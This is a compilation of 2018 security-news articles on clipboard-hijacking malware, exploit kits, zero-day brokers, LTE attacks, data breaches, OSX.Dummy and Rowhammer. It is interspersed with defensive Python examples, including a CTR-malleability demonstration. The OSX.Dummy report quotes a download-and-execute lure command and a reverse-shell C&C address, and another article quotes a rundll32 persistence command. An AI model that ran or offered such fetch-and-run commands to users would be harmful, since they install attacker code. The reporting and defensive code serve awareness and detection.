This family of malware, called CryptoCurrency Clipboard Hijackers, monitors the Windows clipboard for cryptocurrency addresses and, if one is detected, replaces the address in the clipboard with the attacker’s own.

With this simple trick, when the user pastes the address, the coins are sent to the attacker.

In March, researchers at Palo Alto Networks discovered a malware dubbed ComboJack that is able to detect when users copy a cryptocurrency address and alters the clipboard to steal cryptocurrencies and payments. In June, experts from Qihoo 360 Total Security spotted a new malware campaign spreading a clipboard hijacker, tracked as ClipboardWalletHijacker, that infected over 300,000 computers; most of the victims are located in Asia, mainly China.
What is peculiar about the sample of cryptocurrency clipboard hijackers recently discovered by researchers at Bleeping Computer?

While most of the previous samples monitored for 400-600 thousand cryptocurrency addresses, the sample discovered this week by BleepingComputer monitors for more than 2.3 million cryptocurrency addresses.

CryptoCurrency Clipboard Hijackers

The following video shows how CryptoCurrency Clipboard Hijackers replace cryptocurrency addresses found within the Windows clipboard.

The only reliable way to prevent this kind of attack is to double-check the pasted address against the intended one before confirming the transaction.
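The check the article recommends, comparing the pasted address with the intended one, can be automated at the point of use. The following is an added example (my code, not BleepingComputer's analysis or the malware's): it validates a Bitcoin address's Base58Check checksum and compares the clipboard content with the recipient address obtained out of band, so that a well-formed but different address is reported as a substitution rather than a typo. The function names are mine; the sample addresses are constructed for the example, with the genesis-block address and a Bitcoin wiki example address standing in for the intended and the substituted recipients.

```python
"""Added example: validate a pasted Bitcoin address and spot clipboard
substitution before a transfer is confirmed. Not code from the article.
Assumption: the intended address is known from an out-of-band source, and
only legacy Base58Check (P2PKH "1...", P2SH "3...") addresses are handled."""
import hashlib
from typing import Optional

_B58_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"


def base58check_decode(address: str) -> Optional[bytes]:
    """Return the 21-byte payload (version byte + hash160) of a Base58Check
    string, or None if a character is invalid or the 4-byte checksum fails."""
    n = 0
    for ch in address:
        idx = _B58_ALPHABET.find(ch)
        if idx < 0:
            return None
        n = n * 58 + idx
    body = n.to_bytes((n.bit_length() + 7) // 8, "big") if n else b""
    # Every leading '1' encodes one leading zero byte.
    leading = len(address) - len(address.lstrip("1"))
    raw = b"\x00" * leading + body
    if len(raw) != 25:
        return None
    payload, checksum = raw[:-4], raw[-4:]
    expected = hashlib.sha256(hashlib.sha256(payload).digest()).digest()[:4]
    return payload if checksum == expected else None


def is_valid_btc_address(address: str) -> bool:
    payload = base58check_decode(address)
    # Mainnet version bytes: 0x00 = P2PKH, 0x05 = P2SH.
    return payload is not None and payload[0] in (0x00, 0x05)


def check_paste(intended: str, clipboard: str) -> str:
    """Verdict on the address about to be pasted:
    'ok'          clipboard holds exactly the intended, valid address
    'substituted' clipboard holds a different but well-formed address, the
                  symptom of a clipboard hijacker (a random typo would fail
                  the checksum instead)
    'malformed'   clipboard content is not a valid address at all"""
    intended, clipboard = intended.strip(), clipboard.strip()
    if not is_valid_btc_address(clipboard):
        return "malformed"
    if clipboard != intended:
        return "substituted"
    return "ok"


# Constructed samples: the genesis-block address plays the intended recipient,
# a Bitcoin wiki example address plays the hijacker's replacement, and the
# look-alike is the intended address with its last character changed.
INTENDED = "1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa"
SUBSTITUTED = "1BvBMSEYstWetqTFn5Au4m4GFg7xJaNVN2"
LOOKALIKE = "1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNb"

if __name__ == "__main__":
    for clip in (INTENDED, SUBSTITUTED, LOOKALIKE):
        print(clip, "->", check_paste(INTENDED, clip))
```

The checksum step matters for the verdict: a hijacker plants a fully valid address of its own, so the only signal is the mismatch with the address the user meant to use, whereas a corrupted copy fails the checksum and would be rejected by the wallet anyway.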

The infection was associated with the recent campaign that targeted Windows computers with the so-called All-Radio 4.27 Portable malware package.

CryptoCurrency Clipboard Hijackers infection

“If your computer is suddenly displaying the above program, then your computer is infected with malware that installs rootkits, miners, information-stealing Trojans, and a program that is using your computer to send out spam.” reads a post published by BleepingComputer.

Once the malicious code is installed, a DLL named d3dx11_31.dll is downloaded to the Windows Temp folder and an autorun entry called “DirectX 11” is created to run the library every time a user logs into the computer.

“This DLL will be executed using rundll32.exe with the “rundll32 C:\Users\[user-name]\AppData\Local\Temp\d3dx11_31.dll,includes_func_runnded” command.”

As usual, let me suggest using an up-to-date antivirus solution to detect and neutralize these threats.


RIG Exploit Kit operators leverage PROPagate Injection Technique to deliver Miner
2.7.2018 securityaffairs
Exploit

FireEye has documented the PROPagate code injection technique, which was observed for the first time in a malware distribution campaign in the wild.

The PROPagate code injection technique was first discovered in November 2017 by a security researcher at Hexacorn, who demonstrated that it works on all recent Windows versions and could allow attackers to inject malicious code into other applications.

The researcher found that it is possible to abuse legitimate GUI window properties (UxSubclassInfo and CC32SubclassInfo), which the SetWindowSubclass API (a function of the Windows operating system that manages GUIs) uses internally, to load and execute malicious code inside the processes of legitimate applications.

Malware authors took several months to adopt the PROPagate code injection technique in a live malware campaign.

Recently the experts at FireEye uncovered a campaign in which the RIG Exploit Kit delivers a Monero miner via the PROPagate code injection technique.

The operators of the RIG exploit kit hijack traffic from legitimate sites using a hidden iframe and redirect it to a page hosting the exploit kit. The RIG exploit kit uses three JavaScript snippets, each of which uses a different technique to deliver the malicious payload. The three techniques used to spread the malware are:

via malicious JavaScript;
via Flash;
via Visual Basic script;
Below is the attack chain as described by FireEye:

“The attack chain starts when the user visits a compromised website that loads the RIG EK landing page in an iframe. The RIG EK uses various techniques to deliver the NSIS (Nullsoft Scriptable Install System) loader, which leverages the PROPagate injection technique to inject shellcode into explorer.exe.” reads the analysis published by FireEye.

“This shellcode executes the next payload, which downloads and executes the Monero miner.”

PROPagate injection technique

The analysis of the payload allowed the experts to determine that the threat actors used multiple payloads and anti-analysis techniques to evade analysis environments.

PROPagate code injection

“Although we have been observing a decline in Exploit Kit activity, attackers are not abandoning them altogether. In this blog post, we explored how RIG EK is being used with various exploits to compromise endpoints. We have also shown how the NSIS Loader leverages the lesser known PROPagate process injection technique, possibly in an attempt to evade security products.” concluded FireEye.


Zerodium offers up to $500,000 for Linux Zero-Day exploits
1.7.2018 securityaffairs
Exploit

The sale of zero-day exploits is a prolific business: zero-day broker Zerodium offers rewards of up to $500,000 for FreeBSD, OpenBSD, NetBSD and Linux zero-days.
The sale of zero-day exploits is a prolific business that most people are unaware of. To better understand its evolution, let’s analyze the offer of the popular exploit broker Zerodium, starting with the company’s own description of its mission on its website.

“ZERODIUM pays premium bounties and rewards to security researchers to acquire their original and previously unreported zero-day research affecting major operating systems, software, and devices.” reads the company website. “While the majority of existing bug bounty programs accept almost any kind of vulnerabilities and PoCs but pay very low rewards, at ZERODIUM we focus on high-risk vulnerabilities with fully functional exploits, and we pay the highest rewards on the market.”

Zerodium, like other zero-day brokers, buys zero-days and sells them to government agencies and law enforcement, but many privacy advocates fear that these flaws could end up with surveillance firms that sell their products to authoritarian regimes.

The company is offering rewards of up to $500,000 for zero-day exploits in UNIX-based operating systems, including OpenBSD, FreeBSD and NetBSD. The same offer applies to exploits for popular Linux distributions such as Ubuntu, CentOS, Debian, and Tails.

Prices for zero-days depend on several factors, including the market share of the affected platform (exploits for Windows are usually more valuable than Linux ones) and the level of user interaction required for exploitation (no click, one click, two clicks, etc.).

Other factors include the reliability of the exploit, the number of vulnerabilities that must be chained to exploit the flaw, the success rate, and the OS configuration required for exploitation.

The rewards for Linux zero-days continue to increase, a trend already observed in February, when rewards reached as high as $45,000.
zerodium Zero-day exploits

Zerodium

@Zerodium
We're currently acquiring #0day exploits (privilege escalation or RCE) for the following operating systems: OpenBSD, FreeBSD, NetBSD, Ubuntu, CentOS, Debian, and Tails. For related inquiries or submissions, contact us: https://zerodium.com/submit.html

6:17 PM - Jun 27, 2018
The company shared the latest zero-day acquisition drive as part of its ordinary zero-day acquisition program.

The acquisition drive includes special offers, usually associated with higher fees, for specific zero-day exploits.

Zerodium is still looking for remote code execution or local privilege escalation exploits for Linux and BSD systems, offering variable rewards that can reach $500,000.

The firm’s payouts for Linux privilege escalation zero-day exploits range from $10,000 to $30,000, while a local privilege escalation (LPE) in Linux could be paid up to $100,000.

Rewards for Linux remote code execution exploits range from $50,000 to $500,000, with zero-days for CentOS and Ubuntu being the most wanted.

Over the months, Zerodium has published several acquisition drives seeking zero-day exploits targeting iOS, Adobe Flash Player, the Tor Browser, mobile IM apps, and Android.

zerodium Zero-day exploits

In the past Zerodium offered up to $1.5 million for an iOS zero-day exploit.

Looking at the price list for zero-days, we can see that exploits for server environments such as Linux command high rewards, but mobile exploits remain the most expensive on the zero-day market.

Recently a new player, Crowdfense, emerged in the zero-day market, launching an acquisition program with prizes of $10 million.


Security issues in the LTE standard expose billions of mobile users to attacks
1.7.2018 securityaffairs Attack

Security issues in the LTE mobile device standard could be exploited by persistent attackers to spy on users’ cellular networks and hijack data traffic.
A team of researchers from Ruhr-Universität Bochum and New York University Abu Dhabi has discovered security issues in the LTE mobile device standard that could be exploited by persistent attackers (i.e. intelligence agencies or well-funded groups) to spy on users’ cellular networks, eavesdrop on communications, and hijack their data traffic.

The LTE mobile telephony standard is currently used by billions of people worldwide and, compared to earlier standards, includes many security improvements.

The experts devised surveillance techniques that allowed them to identify people within a phone tower radio cell, spy on their traffic, and redirect them to rogue websites by tampering with DNS lookups.

The researchers demonstrated three attack scenarios that target the data link layer of Long-Term Evolution networks, also known as LTE or 4G.

“Our security analysis of the mobile communication standard LTE (Long-Term Evolution, also known as 4G) on the data link layer (so-called layer two) has uncovered three novel attack vectors that enable different attacks against the protocol.” reads the analysis published by the experts.

“On the one hand, we introduce two passive attacks that demonstrate an identity mapping attack and a method to perform website fingerprinting. On the other hand, we present an active cryptographic attack called aLTEr attack that allows an attacker to redirect network connections by performing DNS spoofing due to a specification flaw in the LTE standard.”

The data link layer lies on top of the physical channel, which carries the wireless transmission of information between users and the network. Layer two defines how multiple users can access the resources of the network, helps to correct transmission errors, and implements data protection through encryption.

The researchers distinguish between passive and active attack techniques: the former include identification and website snooping, the latter is the webpage redirection attack.

The identification and website snooping techniques could allow attackers to spy on users by listening to what’s going out over the airwaves from phones, whereas the webpage redirection attack could be conducted by an attacker that sets up a malicious cell tower to tamper with transmissions.

The experts dubbed the DNS spoofing attack “aLTEr” and described it as follows:

“The aLTEr attack exploits the fact that LTE user data is encrypted in counter mode (AES-CTR) but not integrity protected, which allows us to modify the message payload: the encryption algorithm is malleable, and an adversary can modify a ciphertext into another ciphertext which later decrypts to a related plaintext,” reads the research paper published by the experts.

“the adversary sends signals to the network or to the device by using a specific device that is capable of simulating the legitimate network or user device. In our case, the adversary does both and intercepts all transmissions between Bob and the network. Thus, Bob perceives the adversary as his usual network provider and connects to the simulation device. Towards the real network, the adversary acts like she was Bob.”

LTE active attack

The experts conducted the attacks in a controlled environment and highlighted that the requirements are, at the moment, hard to meet in real LTE networks, although persistent attackers could replicate them in the wild.

The researchers used a shielding box to stabilize the radio layer and prevent interference during the tests.

The team set up two servers, a DNS server and an HTTP server, to show how an attacker can hijack connections (see the PoC attack video).

The experts published a paper with all the technical details of the aLTEr attack and a video PoC of the attack:

The attack also requires equipment (USRP) that goes for about $4,000 to emulate the behavior of spying boxes such as IMSI catchers or Stingray.

The researchers also described countermeasures to adopt in order to mitigate the attacks. The researchers already shared findings of their study with telco institutions, including the GSM Association (GSMA) and the 3rd Generation Partnership Project (3GPP), and telephone companies.

According to the experts, forthcoming 5G networks may also be vulnerable to these attack techniques: although the 5G standard supports authenticated encryption, it does not make it mandatory.

“The use of authenticated encryption would prevent the aLTEr attack, which can be achieved through the addition of message authentication codes to user plane packets,” the experts said.

“However, the current 5G specification does not require this security feature as mandatory, but leaves it as an optional configuration parameter.”
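The malleability the researchers describe is a general property of counter mode, and the countermeasure they recommend is exactly the message authentication code quoted above. The following added example (not code from the aLTEr paper or from this page) shows both sides: a CTR-style ciphertext whose destination field is rewritten without knowledge of the key, and the same modification rejected once an encrypt-then-MAC tag covers the ciphertext. The keystream is generated with HMAC-SHA256 over a counter as a stand-in for AES-CTR (an assumption made so the script needs only the standard library); the packet layout, keys and field names are constructed.

```python
"""Added example: CTR-mode malleability and the MAC that prevents it.
Not code from the aLTEr paper. Assumption: HMAC-SHA256 over a counter
stands in for the AES-CTR keystream; the property demonstrated (C = P xor KS,
so flipping a ciphertext bit flips the same plaintext bit) holds for either."""
import hashlib
import hmac
from typing import Optional, Tuple


def keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hmac.new(key, nonce + counter.to_bytes(8, "big"), hashlib.sha256).digest()
        counter += 1
    return bytes(out[:length])


def ctr_encrypt(key: bytes, nonce: bytes, data: bytes) -> bytes:
    return bytes(d ^ k for d, k in zip(data, keystream(key, nonce, len(data))))


ctr_decrypt = ctr_encrypt  # XOR with the same keystream undoes itself


def malleate(ciphertext: bytes, offset: int, known: bytes, desired: bytes) -> bytes:
    """Rewrite the plaintext bytes at `offset` from `known` to `desired`
    without the key: XOR the difference of the two values into the
    ciphertext. This is the weakness the paper describes; it only needs a
    guess at the original bytes (a field with predictable content)."""
    assert len(known) == len(desired)
    c = bytearray(ciphertext)
    for i, (a, b) in enumerate(zip(known, desired)):
        c[offset + i] ^= a ^ b
    return bytes(c)


def mac_tag(mac_key: bytes, nonce: bytes, ciphertext: bytes) -> bytes:
    """Encrypt-then-MAC tag covering nonce and ciphertext."""
    return hmac.new(mac_key, nonce + ciphertext, hashlib.sha256).digest()


def decrypt_authenticated(key: bytes, mac_key: bytes, nonce: bytes,
                          ciphertext: bytes, tag: bytes) -> Optional[bytes]:
    """Return the plaintext only if the tag verifies; None means tampering."""
    if not hmac.compare_digest(mac_tag(mac_key, nonce, ciphertext), tag):
        return None
    return ctr_decrypt(key, nonce, ciphertext)


# Constructed sample packet with a fixed-width destination field at offset 4.
KEY, MAC_KEY, NONCE = b"k" * 32, b"m" * 32, b"nonce-01"
PACKET = b"dst=10.0.0.001 payload=..."
FIELD_OFFSET, ORIGINAL, REPLACEMENT = 4, b"10.0.0.001", b"10.0.0.002"


def demo() -> Tuple[bytes, Optional[bytes]]:
    """(what an unauthenticated receiver decrypts, what an authenticating one returns)"""
    ct = ctr_encrypt(KEY, NONCE, PACKET)
    tag = mac_tag(MAC_KEY, NONCE, ct)
    tampered = malleate(ct, FIELD_OFFSET, ORIGINAL, REPLACEMENT)
    unauth = ctr_decrypt(KEY, NONCE, tampered)                        # altered field accepted
    auth = decrypt_authenticated(KEY, MAC_KEY, NONCE, tampered, tag)  # rejected -> None
    return unauth, auth


if __name__ == "__main__":
    print(demo())
```

The tag must be computed over the ciphertext (encrypt-then-MAC) and checked with a constant-time comparison before any decryption takes place; that is the "message authentication codes on user plane packets" the researchers ask for, and it is what a mandatory integrity option in the 5G user plane would provide.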

The researchers will present full details of their research at the 2019 IEEE Symposium on Security and Privacy.


Data Broker Exactis data breach, one of the biggest ever, exposes millions of Americans
1.7.2018 securityaffairs Incident

Security expert Vinny Troia has found a huge trove of data belonging to millions of Americans that were left unsecured online.
The security researcher Vinny Troia was analyzing the security of Elasticsearch installations exposed online when he discovered millions of records belonging to Americans that had been left unsecured.

The expert used Shodan to find U.S. Elasticsearch databases exposed on the internet, the query allowed him to discover around 7,000 instances. One of them immediately appeared very interesting, an archive owned by US data broker firm Exactis that was containing personal data on both consumers and businesses.

“Earlier this month, security researcher Vinny Troia discovered that Exactis, a data broker based in Palm Coast, Florida, had exposed a database that contained close to 340 million individual records on a publicly accessible server. The haul comprises close to 2 terabytes of data that appears to include personal information on hundreds of millions of American adults, as well as millions of businesses.” reported Wired.

“While the precise number of individuals included in the data isn’t clear—and the leak doesn’t seem to contain credit card information or Social Security numbers—it does go into minute detail for each individual listed, including phone numbers, home addresses, email addresses, and other highly personal characteristics for every name.”

The archive contained roughly 340 million records (230 million on consumers and 110 million on business contacts), making this probably the biggest potential breach ever seen.

According to the Exactis website, the firm has gathered consumer data on 218 million individuals and 110 million households.

The archive contains 88 million records that include email addresses and postal addresses, while 112 million records include residential phone numbers.

Business data includes 21 million records of companies, 40 million postal addresses, 21 million records with email addresses and postal address, and 52 million business phone numbers.

The good news is that the archive did not include credit card information or Social Security numbers.

Exactis data breach

At the time of writing it is not clear to what extent the archive was accessed, but experts believe it was completely exposed online. The archive includes interests, habits, the age and gender of children, and more than 400 variables ranging from religion and pets to whether a person smokes.

Knowledge of such detailed profiles could allow attackers to launch highly effective spear-phishing campaigns.

The security expert promptly reported his findings to the FBI and Exactis, the company immediately secured the database.

Customers filed a proposed class action in Florida federal court last week, claiming that Exactis did not follow best-practice guidelines to protect the data.


Recently discovered OSX.Dummy mac malware is targeting the cryptocurrency community
30.6.2018 securityaffairs Apple

The former NSA white hat hacker and malware researcher Patrick Wardle analyzed a new mac malware dubbed OSX.Dummy that targets the cryptocurrency community.
The popular expert decided to analyze the malicious code after the security researcher Remco Verhoef (@remco_verhoef) posted an interesting entry on the SANS ‘InfoSec Handlers Diary Blog’ titled “Crypto community target of MacOS malware.”
“Previous days we’ve seen multiple MacOS malware attacks, originating within crypto related Slack or Discord chats groups by impersonating admins or key people. Small snippets are being shared, resulting in downloading and executing a malicious binary.” wrote Verhoef.

Wardle’s intent was to demonstrate that Objective-See’s tools can generically thwart this new threat, even though it went undetected by all antivirus software.

OSX.Dummy malware

Verhoef noticed that the attacks originated within crypto-related Slack or Discord chat groups, with the attackers impersonating admins or key people.

The attackers shared small code snippets like the following one resulting in downloading and executing a malicious binary.

$ cd /tmp && curl -s curl $MALICIOUS_URL > script && chmod +x script && ./script
Wardle noticed that the malicious binary is not signed, which means it would be blocked by Gatekeeper, but the attackers worked around this limitation by having victims download and run the binary directly via terminal commands.

Wardle conducted a dynamic analysis of the malware using a High Sierra virtual machine with various Objective-See tools installed.

The malware first sets the script to be owned by root:

# procInfo

monitoring for process events...

process start:
pid: 432
path: /usr/bin/sudo
args: (
"/usr/bin/sudo",
"-S",
"-p",
"#node-sudo-passwd#",
chown,
root,
"/tmp/script.sh"
)
It then changes the file’s permissions to root by executing the sudo command, which requires the user to enter their password in the terminal.

The malicious code saves the password to /tmp/dumpdummy.

The malware makes a series of operations that allow it to gain persistence through a malicious launch daemon.

The malware sets the RunAtLoad key to true, which means the value of the Program key, /var/root/script.sh, will be executed automatically by the OS whenever the system is rebooted.

The script will attempt to connect to 185[.]243.115.230 on port 1337.
“It then duplicates stdin, stdout and stderr to the socket, before executing /bin/sh with the -i flag. In other words, it’s setting up an interactive reverse shell.” explained Wardle.

“If you have a firewall product installed, such as Objective-See’s LuLu, this network activity will be detected”

If the malware successfully connects to the C&C server (185[.]243.115.230:1337), the attacker will be able to execute arbitrary commands as root on the target system.

Below are the key findings of Wardle’s analysis of OSX.Dummy:

the infection method is dumb
the massive size of the binary is dumb
the persistence mechanism is lame (and thus also dumb)
the capabilities are rather limited (and thus rather dumb)
it’s trivial to detect at every step (that dumb)
…and finally, the malware saves the user’s password to dumpdummy
“To check if you’re infected run KnockKnock as root (since the malware sets its components to be readable only by root). Look for an unsigned launch item com.startup.plist executing something named ‘script.sh’” Wardle concluded.
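Wardle's detection advice above (look for an unsigned launch item com.startup.plist executing script.sh) can be turned into a scan of the launch directories. The following is an added example, not Wardle's or Objective-See's code: it parses launchd property lists with plistlib and flags the traits the analysis describes, namely the known file name, a program named script.sh, and RunAtLoad combined with a program under /var/root or /tmp. The Label value com.startup, the directory list and the sample plists are assumptions constructed for the example.

```python
"""Added example: flag launchd items with the traits Wardle describes for
OSX.Dummy. Not Wardle's or Objective-See's code. Assumptions: the Label value
com.startup and the directory list are mine; the sample plists are constructed."""
import plistlib
from pathlib import Path
from typing import Any, Dict, List

SUSPICIOUS_LABELS = {"com.startup"}           # assumed Label of com.startup.plist
SUSPICIOUS_FILENAMES = {"com.startup.plist"}  # file name given in the analysis
SUSPICIOUS_PROGRAMS = {"script.sh"}           # program name given in the analysis
SUSPICIOUS_PREFIXES = ("/var/root/", "/tmp/")


def assess_launch_item(data: bytes, name: str = "<memory>") -> List[str]:
    """Return the reasons a launch item looks suspicious (empty list = clean)."""
    try:
        item: Dict[str, Any] = plistlib.loads(data)
    except Exception as exc:  # an unparsable plist in a launch dir is itself notable
        return [f"{name}: unparsable plist ({exc})"]
    reasons: List[str] = []
    label = str(item.get("Label", ""))
    targets = [str(item.get("Program", ""))]
    targets += [str(a) for a in (item.get("ProgramArguments") or [])]
    targets = [t for t in targets if t]
    if label in SUSPICIOUS_LABELS or Path(name).name in SUSPICIOUS_FILENAMES:
        reasons.append(f"{name}: label/file name matches the OSX.Dummy launch item")
    if any(Path(t).name in SUSPICIOUS_PROGRAMS for t in targets):
        reasons.append(f"{name}: executes a program named script.sh")
    if item.get("RunAtLoad") and any(t.startswith(SUSPICIOUS_PREFIXES) for t in targets):
        reasons.append(f"{name}: RunAtLoad with a program under /var/root or /tmp")
    return reasons


def scan_launch_dirs(dirs=("/Library/LaunchDaemons", "/Library/LaunchAgents")) -> Dict[str, List[str]]:
    """Assess every .plist in the given directories; run as root, since the
    malware makes its files readable only by root."""
    findings: Dict[str, List[str]] = {}
    for d in dirs:
        for p in Path(d).glob("*.plist"):
            try:
                reasons = assess_launch_item(p.read_bytes(), str(p))
            except OSError as exc:
                reasons = [f"{p}: unreadable ({exc}); rerun as root"]
            if reasons:
                findings[str(p)] = reasons
    return findings


# Constructed sample modelled on the article's description (not a real capture).
SAMPLE_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.startup</string>
  <key>Program</key><string>/var/root/script.sh</string>
  <key>RunAtLoad</key><true/>
</dict></plist>
"""

# Constructed benign item: RunAtLoad alone is normal and must not be flagged.
BENIGN_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.updater</string>
  <key>ProgramArguments</key><array><string>/usr/local/bin/updater</string></array>
  <key>RunAtLoad</key><true/>
</dict></plist>
"""

if __name__ == "__main__":
    print(assess_launch_item(SAMPLE_PLIST, "/Library/LaunchDaemons/com.startup.plist"))
    print(assess_launch_item(BENIGN_PLIST, "/Library/LaunchDaemons/com.example.updater.plist"))
    print(scan_launch_dirs())
```

The third rule is the one that generalises beyond this sample: a launch item that starts a script from a world-writable or root-private scratch location at boot is unusual for legitimate software, whereas RunAtLoad by itself is common and must not be treated as an indicator.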


Twitter shared details about its strategy for fighting spam and bots
30.6.2018 securityaffairs
Social

Twitter provided some details on new security processes aimed at preventing malicious automation and spam.
The tech giant also shared data on the success obtained with the introduction of the new security measures.
Social media platforms are a privileged tool for psyops and malicious campaigns; for this reason, Twitter rolled out new features to detect and prevent abuse.

Threat actors make extensive use of bots to spread propaganda and malicious links, and social media platforms are investing significant effort in mitigating these threats.

Twitter claims that in May it challenged more than 9.9 million potentially automated accounts used for malicious activity every week, compared with 6.4 million in December 2017.
The social media platform said that the security measures allowed it to drastically reduce the spam reports received from users, from 25,000 daily reports in March to 17,000 in May.
The company is removing 214% more spam accounts compared to 2017. Twitter suspended over 142,000 apps in the first quarter of 2018, most of which were shut down within a week or even within hours of being registered.

Twitter introduced measures to evaluate account metrics in near-real time.

The platform is able to recognize bot activity by detecting synchronized operations conducted by multiple accounts.

Twitter announced it will remove follower and engagement counts from accounts flagged as suspicious that have been put into a read-only state until they pass a challenge, such as confirming a phone number.

“So, if we put an account into a read-only state (where the account can’t engage with others or Tweet) because our systems have detected it behaving suspiciously, we now remove it from follower figures and engagement counts until it passes a challenge, like confirming a phone number.” reads the blog post published by Twitter.

“We also display a warning on read-only accounts and prevent new accounts from following them to help prevent inadvertent exposure to potentially malicious content,”
The company introduced measures to audit existing accounts and control the creation of new ones.
Twitter is increasing checks on the sign-up process to make it harder to register spam accounts, for example by requiring more interaction from the user, such as the confirmation of an email address.

“As part of this audit, we’re imminently taking action to challenge a large number of suspected spam accounts that we caught as part of an investigation into misuse of an old part of the signup flow,” continues the post. “These accounts are primarily follow spammers, who in many cases appear to have automatically or bulk followed verified or other high-profile accounts suggested to new accounts during our signup flow.”

The company is investing in behavioral detection: its engineers are working on measures that, once suspicious activity is detected, challenge the account owner with actions that require human interaction.


Adidas warns US consumers of a potential security breach
30.6.2018 securityaffairs Incident

The sportswear company Adidas announced that it has launched an investigation after learning of a potential security breach that could impact millions of its US customers.
Adidas published a security alert to warn that hackers may have stolen customer data from its US website.

The German sportswear company confirmed that attackers may have had unauthorized access to customer personal data, including addresses, email addresses, and encrypted passwords.

The company highlighted that neither financial nor fitness information was exposed.

“On June 26, adidas became aware that an unauthorized party claims to have acquired limited data associated with certain consumers.” states the data breach notification published by Adidas.

“According to the preliminary investigation, the limited data includes contact information, usernames and encrypted passwords, Adidas has no reason to believe that any credit card or fitness information of those consumers was impacted.”

adidas data breach

The company became aware of the security breach on 26 June and notified law enforcement.

The firm is notifying affected customers, who could be targeted by spear-phishing campaigns in the coming weeks.

US customers are urged to change their password and to remain vigilant about potential attacks.


Facebook Quiz app NameTests left 120 Million users’ data exposed online
30.6.2018 securityaffairs
Social

Experts discovered a third-party quiz app, called NameTests, that was found exposing data of up to 120 million Facebook users.
A bug on Nametests.com exposed the data of over 120 million users who took personality quizzes on Facebook; the good news is that the flaw was addressed as part of Facebook’s Data Abuse Bounty Program launched in April.

nametests

The issue resided in Nametests.com, which shared users’ data with any third party that requested it.

The flaw was reported by the researcher Inti De Ceukelaire, who explained that when loading a personality test, the website displays personal information loaded from http://nametests.com/appconfig_user.

The data loaded from Nametests.com was wrapped in a JavaScript file, which means that any other website could load it and read it.

“In a normal situation, other websites would not be able to access this information. Web browsers have mechanisms in place to prevent that from happening.” the researcher wrote in a blog post.

“Since NameTests displayed their user’s personal data in JavaScript file, virtually any website could access it when they would request it,”

The experts set up a website that fetched data about the visitor from the Nametests.com website. In turn, Nametests.com provided the access token that could also be used to gain access to the visitor's posts, photos and friends, depending on the permissions granted.

“NameTests would also provide a secret key called an access token, which, depending on the permissions granted, could be used to gain access to a visitor’s posts, photos and friends. It would only take one visit to our website to gain access to someone’s personal information for up to two months.” De Ceukelaire added.

The expert also published a video PoC that shows how NameTests kept revealing a visitor's identity even after the app was deleted.

The user information remained available through the website even after the application had been deleted; to prevent their data from being leaked, users would have had to manually delete the cookies on their devices.

The issue was reported to Facebook's Data Abuse Bounty Program on April 22, and a fix was rolled out on June 25.

According to Facebook, the bug could “have affected Facebook information people shared with nametests.com”. In response to the incident, the tech giant revoked the access tokens for everyone on Facebook who had signed up to use the app.

“It was reported by Inti De Ceukelaire and we worked with the app’s developer — Social Sweethearts — to address the website vulnerability he identified which could have affected Facebook information people shared with nametests.com.” reads a post published by Facebook.

“To be on the safe side, we revoked the access tokens for everyone on Facebook who has signed up to use this app. So people will need to re-authorize the app in order to continue using it.”

Facebook awarded the expert $8,000 instead of $4,000 because he chose to donate the bounty to charity.

“I also got a response from NameTests. The public relations team claims that, according to the data and knowledge they have, they found no evidence of abuse by a third party. They also state that they have implemented additional tests to find such bugs and avoid them in the future,” the researcher concluded.


The popular online survey software Typeform suffered a security breach
30.6.2018 securityaffairs Incident

Typeform, the popular online survey platform, has suffered a data breach that exposed partial data of some users, no payment card data was stolen.

Typeform, the popular online survey platform, is the latest victim of a data breach. Typeform software is widely adopted by businesses worldwide to easily arrange surveys; it allows the easy creation of interfaces to collect user data.

The company has confirmed the security breach that exposed partial data of some users.

“On June 27, 2018, our engineering team became aware that an unknown third party gained access to our server and downloaded certain information. As a result of this breach, some data was compromised. ” reads the data breach notification published by the company.

According to Typeform, no payment card data or password information for the website had been exposed in the security breach.

The Spanish firm discovered the intrusion on June 27th, and immediately launched an internal investigation.

The experts discovered that attackers accessed company servers and downloaded a partial backup of data for surveys conducted before May 3rd, 2018.

The company identified the vulnerability exploited by the hackers and patched it a few hours later, then notified the affected users.

At the time of writing there is no information about the flaw exploited by the hackers; the company highlighted that even if customers collected payments via Typeform's Stripe integration, the payment details they collected are safe.


One of Typeform’s customers, the digital mobile bank Monzo, confirmed that personal data of about 20,000 people is likely to have been exposed due to the security breach.

“Our initial investigations suggest that some personal data of about 20,000 people is likely to have been included in the breach.” reads the security advisory published by Monzo.

“For the vast majority of people, this was just their email address. For a much smaller proportion of others, this may have included other data like their Twitter username or postcode. We’ve published a full breakdown at the bottom of this post,”

Unfortunately, the number of data breaches continues to increase, and a growing number of personal details are flooding the black marketplaces.

Yesterday the sportswear company Adidas announced a potential data breach that affected millions of its U.S. customers, while the global entertainment ticketing service Ticketmaster suffered the same problem.


Researchers Devise Rowhammer Attacks Against Latest Android Versions
29.6.2018 securityweek  Android  Attack 

A team of researchers from universities worldwide has devised a new set of DMA-based Rowhammer attacks against the latest Android OS, along with a lightweight defense to prevent such attacks on ARM-based devices.

Rowhammer is a vulnerability impacting dynamic random-access memory (DRAM) chips that can be abused to gain kernel privileges on Linux systems. Discovered in 2012 but documented only in 2014, the bug can also be exploited remotely using JavaScript or via graphics processing units (GPUs).

Last year, researchers from Graz University of Technology, the University of Pennsylvania (and University of Maryland), and University of Adelaide revealed a series of attack methods able to bypass existing defenses against Rowhammer.

Now, eight researchers from Vrije Universiteit Amsterdam, Amrita University India, UC Santa Barbara, and EURECOM propose RAMpage, a set of attacks that target the latest Android versions with a root exploit and app-to-app exploits that bypass all defenses.

In a research paper (PDF), they also propose GuardION, lightweight defenses that mitigate Rowhammer exploitation on ARM systems by isolating DMA buffers with DRAM-level guard rows.

Furthermore, the researchers claim that re-enabling higher order allocations, which Google disabled to prevent attacks, would improve system performance.

Rowhammer is a hardware bug that “consists of the leakage of charge between adjacent memory cells on a densely packed DRAM chip.” This means that, when a row of bits in the DRAM module is used, the neighboring rows are slightly affected, and attackers can abuse this to completely subvert a system’s security.

